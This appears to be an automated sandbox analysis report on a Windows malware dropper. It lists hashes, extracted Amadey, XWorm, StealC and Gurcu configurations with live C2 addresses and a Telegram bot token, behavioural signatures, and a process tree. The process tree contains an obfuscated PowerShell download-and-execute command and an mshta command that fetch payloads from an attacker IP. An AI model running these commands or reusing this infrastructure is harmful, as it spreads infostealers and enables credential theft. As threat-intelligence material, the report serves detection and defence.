Analysis

max time kernel: 30s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-11-2024 02:31

Static task: static1

Behavioral task: behavioral1
Sample: 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
Resource: win10v2004-20241007-en

The signatures and IoCs on this page come from the behavioral2 run (win10v2004-20241007-en). The PIDs, the user SID and the behavioral2/... resource names below are specific to that sandbox instance and are not portable indicators.

General

Target: 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
Size: 1.9MB
MD5: 3204e7adeb4d554e74b4aeb310cc5939
SHA1: 8a2a99bd088af5024c5b18f6cec3e7ec6cb460bc
SHA256: 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12
SHA512: 699307161af2ce71c6ad91f7347383cd45872e0de2492db2586a09fe7d2bb5bbca7757b7f2b2c4b89a30a1023d1812b29e937d7ebb606b43b502047b030a8f43
SSDEEP: 49152:O4/csNlzfLamxFm9gl1WeIunPf03FJYev12xe:OCcS1R26Bt83PvUx
Malware Config

Extracted URLs:
- http://176.113.115.178/FF/3.png
- http://176.113.115.178/FF/2.png
- http://176.113.115.178/Windows-Update
- http://176.113.115.178/FF/1.png

Extracted: amadey
- version: 4.42
- id: 9c9aa5
- C2: http://185.215.113.43
- install_dir: abc3bc1985
- install_file: skotes.exe
- strings_key: 8a35cf2ea38c2817dba29a4b5b25dcf0
- url_paths: /Zu7JuNko/index.php

Extracted: xworm
- C2: 87.120.112.33:8398
- Install_directory: %LocalAppData%
- install_file: svchost.exe
- telegram: https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579

Extracted: stealc
- id: mars
- C2: http://185.215.113.206
- url_path: /c4becf79229cb002.php

Extracted: gurcu
- telegram: https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579 (same bot token and chat_id as the xworm config)
Signatures

Amadey family

Detect Xworm Payload (2 IoCs)
resource / yara_rule:
- behavioral2/files/0x0007000000023cb0-3276.dat: family_xworm
- behavioral2/memory/1828-4483-0x0000000000A90000-0x0000000000AA8000-memory.dmp: family_xworm (PID 1828 is document.exe, see "Executes dropped EXE")

Gurcu family

Stealc family

(Signature title missing from the page) 1 IoC
description / ioc / Process:
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" by powershell.exe
  ConsentPromptBehaviorAdmin = 0 makes UAC elevate administrators without any consent prompt.

Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 5 IoCs)
Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ by:
- cb913a9fce.exe
- 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
- skotes.exe
- L.exe
- a381714d22.exe

Blocklisted process makes network request (4 IoCs)
flow / pid / Process:
- flow 38: PID 1736 powershell.exe
- flow 39: PID 1516 powershell.exe
- flow 47: PID 4312 mshta.exe
- flow 50: PID 4280 powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 15 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths and processes.
pid / Process (PID 7100 is listed twice in the report):
- 7032 powershell.exe
- 6148 powershell.exe
- 5912 powershell.exe
- 4244 powershell.exe
- 5788 powershell.exe
- 400 powershell.exe
- 4452 powershell.exe
- 1736 powershell.exe
- 1516 powershell.exe
- 4280 powershell.exe
- 7100 powershell.exe
- 3608 powershell.exe
- 7100 powershell.exe
- 1508 powershell.exe
- 5512 powershell.exe
Creates new service(s) (2 TTPs)

Downloads MZ/PE file

Uses browser remote debugging (2 TTPs, 1 IoC)
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid / Process:
- 208 chrome.exe
Checks BIOS information in registry (2 TTPs, 16 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Key value queried under \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\:
- SystemBiosDate: wmiprvse.exe
- SystemBiosVersion: 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe, skotes.exe, L.exe, Mig.exe, LB31.exe, cb913a9fce.exe, a381714d22.exe, wmiprvse.exe
- VideoBiosVersion: skotes.exe, Mig.exe, 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe, a381714d22.exe, L.exe, LB31.exe, cb913a9fce.exe

Checks computer location settings (2 TTPs, 6 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
Key value queried: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation by:
- 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
- skotes.exe
- wscript.exe
- WScript.exe
- mshta.exe
- document.exe
Drops startup file (2 IoCs)
description / ioc / Process:
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk by document.exe
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk by document.exe

Executes dropped EXE (12 IoCs)
pid / Process:
- 2160 skotes.exe
- 1204 L.exe
- 380 file.exe
- 948 FunnyJellyfish.exe
- 5304 FunnyJellyfish.tmp
- 1828 document.exe
- 5720 FunnyJellyfish.exe
- 1540 FunnyJellyfish.tmp
- 6188 a381714d22.exe
- 6476 LB31.exe
- 5932 Mig.exe
- 1740 cb913a9fce.exe

Identifies Wine through registry keys (2 TTPs, 5 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Key opened: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine by:
- 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
- skotes.exe
- L.exe
- a381714d22.exe
- cb913a9fce.exe

Loads dropped DLL (2 IoCs)
pid / Process:
- 1960 regsvr32.exe
- 6256 regsvr32.exe
Accesses Microsoft Outlook profiles (1 TTPs, 42 IoCs)
All 42 operations are by RegSvcs.exe under \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\ (the report mixes "Software" and "SOFTWARE"; registry paths are case-insensitive). The same six operations are repeated for each of seven profile roots, 6 x 7 = 42:
- profile roots: SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook, ...\Office\16.0\..., ...\Office\17.0\..., ...\Office\18.0\..., ...\Office\19.0\..., ...\Office\20.0\..., and SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- per root key: Key created, Key queried
- per root key\9375CFF0413111d3B88A00104B2A6676: Key created (twice), Key queried, Key opened

Adds Run key to start application (2 TTPs, 1 IoC)
description / ioc / Process:
- Set value (str): \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe" by document.exe (matches the xworm config: install_file svchost.exe in %LocalAppData%)
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Power Settings (1 TTPs, 8 IoCs)
powercfg controls all configurable power settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid / Process:
- 2904 powercfg.exe
- 6448 powercfg.exe
- 4728 powercfg.exe
- 6136 powercfg.exe
- 5088 powercfg.exe
- 4068 powercfg.exe
- 5364 powercfg.exe
- 3844 powercfg.exe
AutoIT Executable (1 IoC)
AutoIT scripts compiled to PE executables.
resource / yara_rule:
- behavioral2/files/0x0007000000023cd2-8879.dat: autoit_exe

Drops file in System32 directory (4 IoCs)
description / ioc / Process:
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive by powershell.exe
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log by powershell.exe
- File opened for modification: C:\Windows\system32\MRT.exe by Mig.exe
- File opened for modification: C:\Windows\system32\MRT.exe by LB31.exe
The two systemprofile paths show a powershell.exe instance running as SYSTEM. MRT.exe is the Malicious Software Removal Tool binary; two dropped executables opening it for modification is a tampering indicator worth checking with Get-AuthenticodeSignature on the host.

Suspicious use of NtSetInformationThreadHideFromDebugger (5 IoCs)
pid / Process:
- 3672 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
- 2160 skotes.exe
- 1204 L.exe
- 6188 a381714d22.exe
- 1740 cb913a9fce.exe

Suspicious use of SetThreadContext (5 IoCs)
description / pid / Process / procid_target:
- PID 1736 powershell.exe set thread context of 3620 (procid_target 109)
- PID 6476 LB31.exe set thread context of 5668 (procid_target 160)
- PID 5932 Mig.exe set thread context of 5316 (procid_target 196)
- PID 5932 Mig.exe set thread context of 6272 (procid_target 198)
- PID 5932 Mig.exe set thread context of 5420 (procid_target 199)
PID 3620 is RegSvcs.exe (see "Suspicious use of AdjustPrivilegeToken"); together with the eight WriteProcessMemory calls from 1736 into 3620 listed below this is the process-hollowing pattern, with a signed .NET utility as the host.

Drops file in Windows directory (2 IoCs)
description / ioc / Process:
- File opened for modification: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk by svchost.exe
- File created: C:\Windows\Tasks\skotes.job by 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe (skotes.exe is the amadey install_file)
Launches sc.exe (14 IoCs)
sc.exe is a Windows utility to control services on the system.
pid / Process:
- 5600 sc.exe
- 3856 sc.exe
- 5800 sc.exe
- 5840 sc.exe
- 2308 sc.exe
- 7004 sc.exe
- 448 sc.exe
- 5904 sc.exe
- 7160 sc.exe
- 2360 sc.exe
- 644 sc.exe
- 4420 sc.exe
- 2276 sc.exe
- 1948 sc.exe

Command and Scripting Interpreter: JavaScript (1 TTPs)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoC)
pid / pid_target / Process / procid_target:
- 6992 WerFault.exe handled a crash of PID 6188 (a381714d22.exe, procid_target 124)
System Location Discovery: System Language Discovery (1 TTPs, 13 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by:
- L.exe
- cb913a9fce.exe
- 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
- skotes.exe
- FunnyJellyfish.tmp (twice)
- cmd.exe
- timeout.exe
- FunnyJellyfish.exe (twice)
- regsvr32.exe
- RegSvcs.exe
- a381714d22.exe

Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
All by wmiprvse.exe under \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0:
- Key security queried, Key opened, Key queried (the key itself)
- Key value queried: Component Information, ProcessorNameString, Identifier

Delays execution with timeout.exe (1 IoC)
pid / Process:
- 1352 timeout.exe

Enumerates system info in registry (2 TTPs, 1 IoC)
description / ioc / Process:
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier by wmiprvse.exe

Gathers network information (2 TTPs, 1 IoC)
Uses a command-line utility to view the network configuration.
pid / Process:
- 348 ipconfig.exe

Kills process with taskkill (5 IoCs)
pid / Process:
- 6596 taskkill.exe
- 6916 taskkill.exe
- 6088 taskkill.exe
- 6972 taskkill.exe
- 6232 taskkill.exe
Modifies data under HKEY_USERS (46 IoCs)
All 46 operations are by powershell.exe under \REGISTRY\USER\.DEFAULT\Software\:
- Set value (int) under Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\: IntranetName = "1", UNCAsIntranet = "1", AutoDetect = "0", ProxyBypass = "1"
- Key created: Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Key created: Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- Key created under Microsoft\SystemCertificates\: CA, Disallowed, Root, SmartCardRoot, TrustedPeople, trust, each with its Certificates, CRLs and CTLs subkeys (24 keys)
- Key created under Policies\Microsoft\SystemCertificates\: CA, Disallowed, TrustedPeople, trust, each with its Certificates, CRLs and CTLs subkeys (16 keys)
HKU\.DEFAULT is the hive a SYSTEM-account process sees as HKCU, and these certificate-store and ZoneMap keys are created automatically when PowerShell initializes under that account. They are not malicious by themselves; their value is confirming a SYSTEM-level powershell.exe, consistent with the systemprofile file drops above.

Modifies registry class (1 IoC)
description / ioc / Process:
- Key created: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings by powershell.exe

Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoC)
schtasks is often used by malware for persistence or to perform post-infection execution.
pid / Process:
- 5388 schtasks.exe
Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid / Process:
- 1828 document.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid / Process (number of times listed):
- 3672 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe (2)
- 2160 skotes.exe (2)
- 1204 L.exe (2)
- 1736 powershell.exe (2)
- 1516 powershell.exe (2)
- 4280 powershell.exe (3)
- 5788 powershell.exe (3)
- 1540 FunnyJellyfish.tmp (2)
- 6256 regsvr32.exe (12)
- 6188 a381714d22.exe (2)
- 400 powershell.exe (3)
- 3608 powershell.exe (3)
- 4452 powershell.exe (3)
- 7032 powershell.exe (3)
- 7100 powershell.exe (3)
- 6476 LB31.exe (11)
- 6148 powershell.exe (3)
- 5912 powershell.exe (3)

Suspicious use of AdjustPrivilegeToken (64 IoCs; the report caps this list at 64)
Token / pid / Process:
- SeDebugPrivilege: 1736 powershell.exe, 1516 powershell.exe, 3620 RegSvcs.exe, 4280 powershell.exe, 5788 powershell.exe, 1828 document.exe, 400 powershell.exe, 3608 powershell.exe, 4452 powershell.exe, 7032 powershell.exe, 7100 powershell.exe, 6148 powershell.exe, 5912 powershell.exe
- 3608 powershell.exe, full set once: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- 7100 powershell.exe, the same full set once, then a second run truncated by the 64-IoC cap after SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege

Suspicious use of FindShellTrayWindow (1 IoC)
pid / Process:
- 1540 FunnyJellyfish.tmp

Suspicious use of SetWindowsHookEx (1 IoC)
pid / Process:
- 1828 document.exe
Suspicious use of WriteProcessMemory (64 IoCs; the report caps this list at 64)
parent PID (Process) -> target PID (Process), number of writes, procid_target. Target process names are resolved from the other signature sections of this report:
- 3672 (5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe) -> 2160 (skotes.exe), 3 writes, 83
- 2160 (skotes.exe) -> 1204 (L.exe), 3 writes, 91
- 2160 (skotes.exe) -> 380 (file.exe), 2 writes, 95
- 380 (file.exe) -> 5024 (wscript.exe), 2 writes, 163
- 5024 (wscript.exe) -> 1516 (powershell.exe), 2 writes, 97
- 5024 (wscript.exe) -> 1736 (powershell.exe), 2 writes, 98
- 1516 (powershell.exe) -> 4372 (WScript.exe), 2 writes, 148
- 4372 (WScript.exe) -> 1944 (cmd.exe), 2 writes, 105
- 1944 (cmd.exe) -> 4312 (mshta.exe), 2 writes, 107
- 1736 (powershell.exe) -> 348 (ipconfig.exe), 2 writes, 108
- 1736 (powershell.exe) -> 3620 (RegSvcs.exe), 8 writes, 109
- 4312 (mshta.exe) -> 4280 (powershell.exe), 2 writes, 110
- 2160 (skotes.exe) -> 948 (FunnyJellyfish.exe), 3 writes, 112
- 948 (FunnyJellyfish.exe) -> 5304 (FunnyJellyfish.tmp), 3 writes, 213
- 5304 (FunnyJellyfish.tmp) -> 5548 (cmd.exe), 3 writes, 114
- 4280 (powershell.exe) -> 5788 (powershell.exe), 2 writes, 116
- 5548 (cmd.exe) -> 1352 (timeout.exe), 3 writes, 117
- 2160 (skotes.exe) -> 1828 (document.exe), 2 writes, 118
- 5548 (cmd.exe) -> 5720 (FunnyJellyfish.exe), 3 writes, 119
- 5720 (FunnyJellyfish.exe) -> 1540 (FunnyJellyfish.tmp), 3 writes, 120
- 1540 (FunnyJellyfish.tmp) -> 1960 (regsvr32.exe), 3 writes, 121
- 1828 (document.exe) -> 400 (powershell.exe), 2 writes, 122
- 2160 (skotes.exe) -> 6188 (a381714d22.exe), 3 writes, 124
- 1960 (regsvr32.exe) -> 6256 (regsvr32.exe), 2 writes, 125

Process tree implied by the writes above (LB31.exe, Mig.exe and cb913a9fce.exe fall outside the 64-entry cap and are not placed):
5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe (3672)
  skotes.exe (2160)
    L.exe (1204)
    file.exe (380)
      wscript.exe (5024)
        powershell.exe (1516)
          WScript.exe (4372)
            cmd.exe (1944)
              mshta.exe (4312)
                powershell.exe (4280)
                  powershell.exe (5788)
        powershell.exe (1736)
          ipconfig.exe (348)
          RegSvcs.exe (3620)
    FunnyJellyfish.exe (948)
      FunnyJellyfish.tmp (5304)
        cmd.exe (5548)
          timeout.exe (1352)
          FunnyJellyfish.exe (5720)
            FunnyJellyfish.tmp (1540)
              regsvr32.exe (1960)
                regsvr32.exe (6256)
    document.exe (1828)
      powershell.exe (400)
    a381714d22.exe (6188)

outlook_office_path (1 IoC)
description / ioc / Process:
- Key queried: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 by RegSvcs.exe

outlook_win_path (1 IoC)
description / ioc / Process:
- Key queried: \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 by RegSvcs.exe
Processes
(process tree indented by depth; each entry gives the image path and PID, then its command line and the signatures it triggered)

C:\Windows\system32\winlogon.exe  (PID 616)
  cmdline: winlogon.exe
  C:\Windows\system32\dwm.exe  (PID 64)
    cmdline: "dwm.exe"
C:\Windows\system32\lsass.exe  (PID 676)
  cmdline: C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe  (PID 952)
  cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe  (PID 392)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe  (PID 1028)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe  (PID 1092)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  C:\Windows\system32\taskhostw.exe  (PID 2820)
    cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe  (PID 2548)
    cmdline: C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Windows\system32\regsvr32.EXE  (PID 5048)
    cmdline: C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1508)
      cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"
      - Command and Scripting Interpreter: PowerShell
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe  (PID 1620)
    cmdline: C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Users\Admin\AppData\Local\Temp\service123.exe  (PID 5596)
    cmdline: C:\Users\Admin\AppData\Local\Temp\/service123.exe
  C:\Windows\system32\regsvr32.EXE  (PID 5904)
    cmdline: C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 5512)
      cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"
      - Command and Scripting Interpreter: PowerShell
C:\Windows\System32\svchost.exe  (PID 1132)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe  (PID 1152)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe  (PID 1192)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe  (PID 1208)
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe  (PID 1312)
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe  (PID 1372)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  C:\Windows\system32\sihost.exe  (PID 2628)
    cmdline: sihost.exe
C:\Windows\system32\svchost.exe  (PID 1380)
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe  (PID 1552)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe  (PID 1564)
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe  (PID 1572)
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe  (PID 1652)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe  (PID 1680)
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe  (PID 1708)
  cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe  (PID 1800)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe  (PID 1820)
  cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe  (PID 1924)
  cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe  (PID 2020)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe  (PID 2028)
  cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe  (PID 1668)
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe  (PID 1756)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe  (PID 2144)
  cmdline: C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe  (PID 2264)
  cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe  (PID 2284)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe  (PID 2448)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe  (PID 2456)
  cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe  (PID 2664)
  cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe  (PID 2764)
  cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe  (PID 2788)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe  (PID 2832)
  cmdline: C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe  (PID 2844)
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe  (PID 2852)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe  (PID 2864)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe  (PID 3100)
  cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe  (PID 3320)
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE  (PID 3440)
  cmdline: C:\Windows\Explorer.EXE
  C:\Users\Admin\AppData\Local\Temp\5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe  (PID 3672)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe  (PID 2160)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Checks computer location settings
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe  (PID 1204)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
      C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe  (PID 380)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        C:\Windows\SYSTEM32\wscript.exe  (PID 5024)
          cmdline: "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
          - Checks computer location settings
          - Suspicious use of WriteProcessMemory
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1516)
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Modifies registry class
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            C:\Windows\System32\WScript.exe  (PID 4372)
              cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
              - Checks computer location settings
              - Suspicious use of WriteProcessMemory
              C:\Windows\System32\cmd.exe  (PID 1944)
                cmdline: "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                - Suspicious use of WriteProcessMemory
                C:\Windows\System32\Conhost.exe  (PID 1932)
                  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                C:\Windows\system32\mshta.exe  (PID 4312)
                  cmdline: mshta http://176.113.115.178/Windows-Update
                  - Blocklisted process makes network request
                  - Checks computer location settings
                  - Suspicious use of WriteProcessMemory
